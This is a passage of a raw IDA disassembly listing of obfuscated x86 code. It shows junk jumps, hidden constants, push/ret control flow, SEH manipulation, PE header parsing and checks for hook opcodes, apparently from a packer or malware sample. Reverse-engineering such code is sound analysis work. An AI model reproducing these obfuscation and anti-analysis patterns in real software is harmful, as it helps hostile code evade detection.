; END OF FUNCTION CHUNK FOR sub_430F88
; =============== S U B R O U T I N E =======================================
sub_431085 proc near ; DATA XREF: sub_4301B9+E98�o
jnz loc_430F55
mov eax, [ebp+8]
or dword ptr [eax-8], 4
mov eax, [ebp-4]
movzx eax, byte ptr [eax]
mov edx, [ebp+8]
mov [edx-18h], eax
jmp loc_42EEFC
sub_431085 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4301B9
loc_4310A3: ; CODE XREF: sub_4301B9:loc_43257C�j
cmp dword ptr [ebp-14h], 4
jmp loc_43079F
; END OF FUNCTION CHUNK FOR sub_4301B9
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_85. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_4310AD: ; CODE XREF: j8.b78ws:00431B7B�j
jmp loc_42FFB6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43119E
loc_4310B2: ; CODE XREF: sub_43119E-BA9�j
jmp loc_42FA9C
; END OF FUNCTION CHUNK FOR sub_43119E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42ECE1
loc_4310B7: ; CODE XREF: sub_42ECE1+7�j
jmp loc_42FA09
; END OF FUNCTION CHUNK FOR sub_42ECE1
; ---------------------------------------------------------------------------
loc_4310BC: ; CODE XREF: j8.b78ws:loc_42EEC8�j
; DATA XREF: sub_42EEBE�o
xchg ecx, [esp]
mov ecx, [esp]
call sub_431DA0
; START OF FUNCTION CHUNK FOR sub_42E14A
loc_4310C7: ; CODE XREF: sub_42E14A+41F3�j
jmp loc_431266
; END OF FUNCTION CHUNK FOR sub_42E14A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430DCF
loc_4310CC: ; CODE XREF: sub_430DCF+1D�j
jmp loc_4302C2
; END OF FUNCTION CHUNK FOR sub_430DCF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43119E
loc_4310D1: ; CODE XREF: sub_43119E:loc_42E615�j
push edx
mov [esp+4+var_4], eax
push 0D492F82Dh
pop eax
sub eax, 0F4161DFFh
cmp eax, 41E3E768h
jmp loc_4312B1
; END OF FUNCTION CHUNK FOR sub_43119E
; =============== S U B R O U T I N E =======================================
sub_4310EC proc near ; DATA XREF: sub_43119E:loc_43187A�o
rol eax, 17h
mov ds:dword_4312B8, eax
retn
sub_4310EC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4310F6 proc near ; CODE XREF: sub_42E972�j
; FUNCTION CHUNK AT 0042E86F SIZE 00000004 BYTES
; FUNCTION CHUNK AT 00430415 SIZE 00000005 BYTES
push ebp
mov ebp, esp
push ecx
mov esp, ebp
mov ebp, offset sub_42E873
jmp loc_430415
sub_4310F6 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_39. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431F41
loc_431107: ; CODE XREF: sub_431F41:loc_432514�j
mov [esi], eax
mov esi, offset sub_431117
xchg esi, [esp+0]
retn
; END OF FUNCTION CHUNK FOR sub_431F41
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430EAC
loc_431112: ; CODE XREF: sub_430EAC:loc_4309E2�j
jmp loc_43061D
; END OF FUNCTION CHUNK FOR sub_430EAC
; =============== S U B R O U T I N E =======================================
sub_431117 proc near ; DATA XREF: sub_431F41-E38�o
; FUNCTION CHUNK AT 00432067 SIZE 0000000A BYTES
pushf
push 9378223h
pop eax
rol eax, 12h
jmp loc_432067
sub_431117 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43119E
loc_431126: ; CODE XREF: sub_43119E+32E�j
pop ecx
shl eax, 7
mov edx, [ebp+8]
mov edx, [edx-8]
or edx, 40h
jmp loc_430CC6
; END OF FUNCTION CHUNK FOR sub_43119E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_89. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42FB98
loc_431139: ; CODE XREF: sub_42FB98+D�j
jmp loc_430D84
; END OF FUNCTION CHUNK FOR sub_42FB98
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430C91
loc_43113E: ; CODE XREF: sub_430C91+1551�j
sub ecx, 4630AE33h
jmp loc_43231A
; END OF FUNCTION CHUNK FOR sub_430C91
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42ED88
loc_431149: ; CODE XREF: sub_42ED88+A05�j
; sub_42ED88+1DA8�j ...
js loc_42E2F1
mov eax, [ebp-4]
call sub_42FF81
push offset loc_42FB04
jmp loc_4305DD
; END OF FUNCTION CHUNK FOR sub_42ED88
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4315E4
loc_431161: ; CODE XREF: sub_4315E4:loc_4303DD�j
mov eax, [ebp-14h]
mov [ebp-4], eax
mov eax, [ebp-14h]
mov [ebp-0Ch], eax
mov eax, [ebp-20h]
jmp loc_431038
; END OF FUNCTION CHUNK FOR sub_4315E4
; ---------------------------------------------------------------------------
loc_431175: ; CODE XREF: j8.b78ws:loc_42F74D�j
add esp, 8
mov eax, [eax]
add eax, [ebp-4]
call sub_430053
jmp loc_43025D
; ---------------------------------------------------------------------------
loc_431187: ; DATA XREF: sub_42E499+1�o
mov ebp, esp
call sub_43038C
; START OF FUNCTION CHUNK FOR sub_42FA02
loc_43118E: ; CODE XREF: sub_42FA02+1CD7�j
jmp loc_432843
; END OF FUNCTION CHUNK FOR sub_42FA02
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_29. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_431194: ; CODE XREF: j8.b78ws:00430400�j
ror eax, 0Ch
push eax
retn
; [00000005 BYTES: COLLAPSED FUNCTION j_nullsub_91. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_43119E proc near ; CODE XREF: sub_42E9AD+C�p
; sub_4314D8:loc_431363�p
var_48 = dword ptr -48h
var_10 = dword ptr -10h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0042E037 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0042E1E3 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0042E2C9 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0042E615 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042E635 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0042E689 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042E888 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0042E98F SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0042EADE SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042EDA8 SIZE 0000004A BYTES
; FUNCTION CHUNK AT 0042EE2F SIZE 00000022 BYTES
; FUNCTION CHUNK AT 0042EE68 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0042EF2A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042F73C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042F79D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042F7F6 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0042F9B2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042FA9C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042FBF8 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0042FCB6 SIZE 00000004 BYTES
; FUNCTION CHUNK AT 0042FD6A SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0042FE21 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042FE7A SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00430019 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0043009C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004300B9 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 004302D6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004302FC SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0043037A SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0043039E SIZE 0000001C BYTES
; FUNCTION CHUNK AT 004303E2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00430537 SIZE 00000030 BYTES
; FUNCTION CHUNK AT 004305E7 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0043067E SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004307D0 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0043089D SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004309A5 SIZE 00000002 BYTES
; FUNCTION CHUNK AT 00430B6D SIZE 00000002 BYTES
; FUNCTION CHUNK AT 00430BAF SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00430C49 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00430C71 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00430CC6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00430E5B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00430E78 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00430E90 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00430F55 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00430F72 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004310B2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004310D1 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00431126 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00431305 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004314BA SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00431518 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00431593 SIZE 00000002 BYTES
; FUNCTION CHUNK AT 0043170C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00431773 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00431817 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043187A SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043196E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00431BC9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00431C22 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00431D09 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00431E1C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00431EB6 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00431F9F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00431FC9 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 004320F3 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00432130 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00432240 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004322DB SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00432519 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00432592 SIZE 00000033 BYTES
; FUNCTION CHUNK AT 004325DA SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004325F1 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00432637 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0043274C SIZE 0000001C BYTES
call sub_430273
loc_4311A3: ; CODE XREF: j8.b78ws:00430F3F�j
jo loc_4312DC
sub ecx, esi
jmp loc_4307D0
; ---------------------------------------------------------------------------
loc_4311B0: ; CODE XREF: j8.b78ws:0042ECF4�j
mov eax, [eax]
add eax, [ebp-4]
call sub_42E5CA
loc_4311BA: ; CODE XREF: sub_42EA85�j
add esp, 0FFFFFFD8h
mov [ebp-20h], eax
mov eax, [ebp-20h]
call sub_4326CB
loc_4311C8: ; CODE XREF: sub_42F886-6A�j
jmp loc_42FCB6
; ---------------------------------------------------------------------------
locret_4311CD: ; CODE XREF: sub_430D6A+15�j
retn
; ---------------------------------------------------------------------------
loc_4311CE: ; CODE XREF: sub_42EA96+2869�j
jmp loc_42FBF8
; ---------------------------------------------------------------------------
loc_4311D3: ; CODE XREF: sub_430FB4+B�j
jmp loc_4322DB
; ---------------------------------------------------------------------------
locret_4311D8: ; CODE XREF: j8.b78ws:loc_42F89F�j
retn
; ---------------------------------------------------------------------------
loc_4311D9: ; CODE XREF: sub_42E1FD+1�j
mov ebp, esp
call nullsub_2
mov eax, ds:dword_432504
call sub_4302E0
mov esp, ebp
pop ebp
push ds:dword_432504
retn
; ---------------------------------------------------------------------------
xchg edi, esi
jmp sub_42FB98
; ---------------------------------------------------------------------------
loc_4311FB: ; CODE XREF: sub_42EE05�j
; DATA XREF: sub_4327E5-39EA�o
mov edx, [ebp+8]
mov [edx-8], eax
jmp loc_430F55
; ---------------------------------------------------------------------------
loc_431206: ; CODE XREF: sub_4327E5+4�j
cmp dword ptr [ebp-10h], 2
jnz loc_430F55
mov eax, [ebp+8]
or dword ptr [eax-8], 8
jmp loc_430F55
; ---------------------------------------------------------------------------
loc_43121C: ; CODE XREF: sub_42EC54+3�j
add esp, 0FFFFFFE4h
mov [ebp-8], edx
mov [ebp-4], eax
xor eax, eax
jmp loc_4303E2
; ---------------------------------------------------------------------------
shr esi, 15h
jmp loc_430B6D
; ---------------------------------------------------------------------------
loc_431234: ; DATA XREF: sub_43044A+D�o
jmp $+5
mov eax, [ebp-4]
push eax
call sub_42E1FD
jmp sub_42E574
; ---------------------------------------------------------------------------
mov ecx, ebx
jmp loc_431F9F
; ---------------------------------------------------------------------------
locret_43124E: ; CODE XREF: j8.b78ws:loc_42E7F7�j
retn
; ---------------------------------------------------------------------------
loc_43124F: ; CODE XREF: sub_430053-519�j
jmp loc_4302FC
; ---------------------------------------------------------------------------
loc_431254: ; CODE XREF: sub_430B64:loc_42FAAB�j
mov eax, ecx
xchg eax, [esp+48h+var_48]
mov esp, ebp
xchg edx, [esp+48h+var_48]
mov ebp, edx
pop edx
jmp loc_4305E7
; ---------------------------------------------------------------------------
loc_431266: ; CODE XREF: sub_42E14A:loc_4310C7�j
jz loc_43259E
jmp loc_431817
; ---------------------------------------------------------------------------
loc_431271: ; CODE XREF: sub_42E2AD�j sub_42E2AD+C�j ...
xor eax, eax
loc_431273: ; CODE XREF: sub_43119E:loc_4302D6�j
; sub_431117:loc_43206C�j
pop large dword ptr fs:0
pop edx
pop ecx
jmp loc_431BC9
; ---------------------------------------------------------------------------
loc_431281: ; CODE XREF: sub_42E426+131�j
mov eax, [ebp-8]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
loc_431288: ; CODE XREF: sub_43094F-9B2�j
; sub_43094F+2E�j
mov eax, [ebp-0Ch]
movzx eax, byte ptr [eax]
push offset loc_430C49
jmp nullsub_30
; ---------------------------------------------------------------------------
loc_431298: ; CODE XREF: sub_432209�j
retn
; ---------------------------------------------------------------------------
db 0CAh, 48h, 1Bh
dword_43129C dd 0 ; sub_42E12B:loc_42FEB6�w ...
; ---------------------------------------------------------------------------
loc_4312A0: ; CODE XREF: sub_42E2AD+17�j
jmp loc_42EADE
; ---------------------------------------------------------------------------
db 71h, 0D0h, 0BFh
dword_4312A8 dd 0 ; sub_4325C5�w
; ---------------------------------------------------------------------------
loc_4312AC: ; CODE XREF: sub_431AD9+12�j
jmp loc_431D09
; ---------------------------------------------------------------------------
loc_4312B1: ; CODE XREF: sub_43119E-B7�j
jmp loc_43196E
; ---------------------------------------------------------------------------
dw 0CA26h
dword_4312B8 dd 0 ; sub_43119E-236E�r ...
; ---------------------------------------------------------------------------
loc_4312BC: ; CODE XREF: sub_4313A8-E35�j
jmp loc_431305
; ---------------------------------------------------------------------------
loc_4312C1: ; CODE XREF: sub_42E972+C�j
jmp loc_42EE2F
; ---------------------------------------------------------------------------
dw 8759h
dword_4312C8 dd 0 ; sub_43119E+D21�w ...
; ---------------------------------------------------------------------------
add edi, eax
jmp sub_42FDAF
; ---------------------------------------------------------------------------
loc_4312D3: ; CODE XREF: j8.b78ws:0042E4FE�j
adc edx, [esp+4]
add esp, 8
mov eax, [eax]
loc_4312DC: ; CODE XREF: sub_43119E:loc_4311A3�j
add eax, [ebp-4]
call sub_430053
push offset sub_4313E5
jmp nullsub_32
sub_43119E endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42FAE7
loc_4312EE: ; CODE XREF: sub_42FAE7-D8C�j
ror eax, 7
push eax
retn
; END OF FUNCTION CHUNK FOR sub_42FAE7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EA96
loc_4312F3: ; CODE XREF: sub_42EA96+B�j
mov eax, [ebp-8]
call sub_4321A8
mov eax, [ebp-30h]
push esi
jmp loc_4311CE
; END OF FUNCTION CHUNK FOR sub_42EA96
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43119E
loc_431305: ; CODE XREF: sub_43119E:loc_4312BC�j
; sub_431ED3:loc_431779�j
jo loc_430537
push ebp
mov ebp, esp
push ecx
mov esp, ebp
pop ebp
push 3D8BB2B4h
jmp loc_431E1C
; END OF FUNCTION CHUNK FOR sub_43119E
; =============== S U B R O U T I N E =======================================
sub_43131C proc near ; CODE XREF: sub_42F886+3�p
; j8.b78ws:004306A3�j
; FUNCTION CHUNK AT 00431C18 SIZE 0000000A BYTES
xchg ecx, [esp+0]
pop ecx
jnz loc_431C18
sub_43131C endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_4306C9
loc_431326: ; CODE XREF: sub_4306C9:loc_431A62�j
jz loc_42FC73
lea eax, [ebp+var_125]
push eax
call sub_43145D
; END OF FUNCTION CHUNK FOR sub_4306C9
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_431338 proc near ; CODE XREF: sub_430C91-1205�j
jmp sub_432300
sub_431338 endp
; =============== S U B R O U T I N E =======================================
sub_43133D proc near ; DATA XREF: sub_431A67+786�o
; FUNCTION CHUNK AT 00431F22 SIZE 00000005 BYTES
push 0B9D85C40h
pop edx
add edx, 79991E29h
xor edx, 2ABEBC42h
call sub_432702
push eax
jmp loc_431F22
sub_43133D endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4314D8
loc_43135A: ; CODE XREF: sub_4314D8-2DED�j
push eax
rol eax, 0Dh
call sub_42E713
loc_431363: ; CODE XREF: sub_431616+9�j
call sub_43119E
test eax, eax
jz loc_430D84
jmp loc_42FA54
; END OF FUNCTION CHUNK FOR sub_4314D8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4320AE
loc_431375: ; CODE XREF: sub_4320AE:loc_431D26�j
push esi
and edx, edi
jmp loc_43039E
; END OF FUNCTION CHUNK FOR sub_4320AE
; =============== S U B R O U T I N E =======================================
sub_43137D proc near ; CODE XREF: j8.b78ws:004307E7�j
; sub_431117:loc_432067�p
; FUNCTION CHUNK AT 0042E1C3 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0042E605 SIZE 00000005 BYTES
xchg ebx, [esp+0]
pop ebx
add eax, 0FF89E5FFh
add eax, ebp
jmp loc_42E605
sub_43137D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431AB0
loc_43138E: ; CODE XREF: sub_431AB0:loc_4304C1�j
mov edx, [ebp+8]
jmp loc_430C21
; END OF FUNCTION CHUNK FOR sub_431AB0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43237F
loc_431396: ; CODE XREF: sub_43237F+4�j
cmp dword ptr [ebp-10h], 0
jnz loc_432361
mov eax, [ebp+8]
jmp loc_42FB67
; END OF FUNCTION CHUNK FOR sub_43237F
; =============== S U B R O U T I N E =======================================
sub_4313A8 proc near ; CODE XREF: sub_43223F�j
; DATA XREF: sub_4309F3:loc_432235�o
var_8 = dword ptr -8
; FUNCTION CHUNK AT 0042E983 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043056A SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0043150D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00432147 SIZE 00000006 BYTES
push 0
push edi
push 0D97B00B8h
pop edi
or edi, 0BE09F339h
and edi, ds:4000B6h
jmp loc_42E983
sub_4313A8 endp
; ---------------------------------------------------------------------------
call nullsub_88
mov dword ptr [ebp-4], 1
mov eax, 0
or eax, eax
jz loc_430C82
push dword ptr [ebp+10h]
jmp loc_4327A5
; ---------------------------------------------------------------------------
locret_4313E3: ; CODE XREF: j8.b78ws:004304B1�j
retn
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_82. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_4313E5 proc near ; DATA XREF: sub_43119E+146�o
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00430A67 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00430B47 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004317EE SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00431C06 SIZE 00000008 BYTES
cmp eax, [ebp-8]
jnz loc_431C06
mov eax, [ebp-14h]
mov eax, [eax+24h]
add eax, [ebp-4]
xor edx, edx
push edx
push eax
jmp loc_430A67
sub_4313E5 endp
; ---------------------------------------------------------------------------
loc_431400: ; CODE XREF: j8.b78ws:0042FA71�j
shl eax, 11h
; =============== S U B R O U T I N E =======================================
sub_431403 proc near ; CODE XREF: sub_430C91:loc_42FD49�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004317CE SIZE 0000000B BYTES
mov [esp+0], edi
pop edi
push ebp
mov ebp, esp
push esi
mov [esp+4+var_4], ecx
jmp loc_4317CE
sub_431403 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43178D
loc_431413: ; CODE XREF: sub_4308AB:loc_4304FC�j
; sub_43157B+D�j ...
mov eax, ds:dword_42E048
mov [ebp-4], eax
mov eax, [ebp-4]
mov esp, ebp
jmp loc_42EBA7
; END OF FUNCTION CHUNK FOR sub_43178D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E9DA
loc_431425: ; CODE XREF: sub_42E9DA:loc_43256D�j
rol eax, 18h
xor eax, 0C5728859h
add eax, ebp
add eax, 0C9A99293h
mov eax, [eax]
movzx eax, word ptr [eax+14h]
add eax, [ebp-4]
jmp loc_42E955
; END OF FUNCTION CHUNK FOR sub_42E9DA
; =============== S U B R O U T I N E =======================================
sub_431444 proc near ; CODE XREF: j8.b78ws:0042E3B2�j
; sub_43058C+1468�p
; FUNCTION CHUNK AT 00430C5D SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004325D5 SIZE 00000005 BYTES
mov [esp+0], edi
pop edi
mov [ebp-0Ch], eax
cmp dword ptr [ebp-4], 0
jz loc_4302CA
mov eax, [ebp-4]
jmp loc_4325D5
sub_431444 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_43145D proc near ; CODE XREF: j8.b78ws:00430D44�j
; sub_4306C9+C6A�p
; FUNCTION CHUNK AT 0042E311 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0042F797 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043029F SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004315D6 SIZE 00000008 BYTES
mov [esp+0], edx
pop edx
call sub_42E2A1
mov [ebp-4], eax
jmp loc_42E311
sub_43145D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431A67
loc_43146E: ; CODE XREF: sub_431A67-3008�j
jz loc_4321E8
jmp loc_42E0FF
; END OF FUNCTION CHUNK FOR sub_431A67
; ---------------------------------------------------------------------------
mov ecx, [esi]
jmp sub_430C91
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4314D8
loc_431480: ; CODE XREF: sub_4314D8-1ADB�j
push eax
retn
; END OF FUNCTION CHUNK FOR sub_4314D8
; [00000005 BYTES: COLLAPSED FUNCTION j_nullsub_72. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_431487 proc near ; CODE XREF: sub_42E584+3�p
push ebp
push offset loc_4303F2
jmp nullsub_33
sub_431487 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4321C5
loc_431492: ; CODE XREF: sub_4321C5:loc_42E04C�j
jnz j_nullsub_52
mov edi, 9F01373Eh
shl ebp, 19h
adc eax, edx
jmp loc_430D84
; END OF FUNCTION CHUNK FOR sub_4321C5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EA96
loc_4314A7: ; CODE XREF: sub_42EA96:loc_431A57�j
mov ebx, [ecx]
shl eax, 18h
shr edx, 0Fh
jp loc_42E965
jmp loc_43041A
; END OF FUNCTION CHUNK FOR sub_42EA96
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43119E
loc_4314BA: ; CODE XREF: sub_43119E:loc_42FE21�j
mov eax, [ebp+8]
cmp dword ptr [eax-1Ch], 0F6h
setz al
loc_4314C7: ; CODE XREF: j8.b78ws:loc_42F87C�j
call sub_430E65
jmp loc_431126
; END OF FUNCTION CHUNK FOR sub_43119E
; ---------------------------------------------------------------------------
add edi, esi
jmp sub_43050F
; =============== S U B R O U T I N E =======================================
sub_4314D8 proc near ; CODE XREF: sub_42E598�p
; j8.b78ws:0042FB4C�j
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0042E6CB SIZE 00000025 BYTES
; FUNCTION CHUNK AT 0042EEC9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042F9FA SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0042FA54 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043002D SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00430706 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00430FE9 SIZE 0000002A BYTES
; FUNCTION CHUNK AT 0043135A SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00431480 SIZE 00000002 BYTES
; FUNCTION CHUNK AT 00431595 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00431F82 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00432298 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004323F3 SIZE 0000000F BYTES
mov [esp+0], esi
pop esi
push ebp
mov ebp, esp
push edx
mov edx, ecx
jmp loc_430706
sub_4314D8 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430F88
loc_4314E7: ; CODE XREF: sub_430F88:loc_432375�j
add ecx, 35D529D7h
jmp loc_42FD4E
; END OF FUNCTION CHUNK FOR sub_430F88
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430BA0
loc_4314F2: ; CODE XREF: sub_430BA0-127B�j
jz loc_42EF2F
loc_4314F8: ; CODE XREF: sub_430BA0:loc_430312�j
call sub_432300
call sub_430343
; END OF FUNCTION CHUNK FOR sub_430BA0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_431502 proc near ; CODE XREF: sub_430C2C+1147�j
jmp sub_432342
sub_431502 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_80. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431729
loc_431508: ; CODE XREF: sub_431729+12�j
jmp loc_430C79
; END OF FUNCTION CHUNK FOR sub_431729
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4313A8
loc_43150D: ; CODE XREF: sub_4313A8-2A1F�j
jmp loc_432147
; END OF FUNCTION CHUNK FOR sub_4313A8
; ---------------------------------------------------------------------------
popf
jmp sub_42E5A2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43119E
loc_431518: ; CODE XREF: sub_43119E-2FA6�j
add eax, [ebp-4]
add eax, 18h
mov [ebp-10h], eax
mov eax, [ebp-10h]
loc_431524: ; CODE XREF: sub_431A47+A�j
mov eax, [eax+60h]
add eax, [ebp-4]
mov [ebp-14h], eax
jmp loc_42E888
; END OF FUNCTION CHUNK FOR sub_43119E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4322A3
loc_431532: ; CODE XREF: sub_4322A3:loc_430A62�j
mov eax, [ebp-4]
; END OF FUNCTION CHUNK FOR sub_4322A3
; START OF FUNCTION CHUNK FOR sub_4309F3
loc_431535: ; CODE XREF: sub_4309F3+13�j
cmp byte ptr [eax], 0E9h
jz loc_42FBD3
mov eax, [ebp-4]
cmp byte ptr [eax], 0EBh
jz loc_42FBD3
jmp loc_42ED21
; END OF FUNCTION CHUNK FOR sub_4309F3
; ---------------------------------------------------------------------------
adc esi, 0F4634D71h
jmp loc_42E008
; ---------------------------------------------------------------------------
not edx
jmp loc_43031D
; ---------------------------------------------------------------------------
mov ebx, esi
jmp sub_430CE7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E487
loc_431568: ; CODE XREF: sub_42E487:loc_432568�j
xor eax, eax
mov al, [ebp-0Ah]
shr eax, 4
xor [ebp-0Ah], al
inc dword ptr [ebp-8]
jmp loc_42E293
; END OF FUNCTION CHUNK FOR sub_42E487
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43157B proc near ; CODE XREF: sub_4325FC�j
var_14 = byte ptr -14h
; FUNCTION CHUNK AT 0043105B SIZE 00000017 BYTES
push ebp
mov ebp, esp
add esp, 0FFFFFFECh
cmp ds:byte_42F75C, 0
jnz loc_431413
jmp loc_43105B
sub_43157B endp
; ---------------------------------------------------------------------------
